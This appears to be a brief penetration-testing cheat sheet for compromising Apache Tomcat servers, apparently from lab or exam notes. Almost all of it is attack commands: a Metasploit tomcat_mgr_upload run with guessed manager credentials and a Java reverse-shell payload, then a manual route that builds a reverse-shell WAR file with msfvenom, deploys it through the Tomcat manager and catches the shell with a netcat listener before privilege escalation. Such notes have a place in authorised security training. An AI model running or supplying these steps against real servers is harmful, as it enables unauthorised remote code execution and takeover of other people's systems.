Tomcat

msf5 auxiliary(scanner/http/tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_upload options set RHOSTS 172.16.64.101 set RPORT 8080 set HttpUsername tomcat set HttpPassword s3cret show payloads java/shell_reverse_tcp set payload java/shell_reverse_tcp set lhost 172.16.64.14 set lport 4444 run id

manually with MsfVenom msfvenom -p java/shell_reverse_tcp lhost=10.10.0.1 lport=4321 -f war -o pwn.war above command, the -p flag specifies the payload, lhost is the IP address of our local machine, lport is the listening port on our machine, the -f flag specifies the desired format, and the -o flag is the name of the output file. tomcat manager link scroll down to deploy section and browse to the WAR file just created. Click the deploy Start listener nc -lvnp 4321 if everything worked correctly, we should see a connection open on our netcat listener at this point is to escalate privileges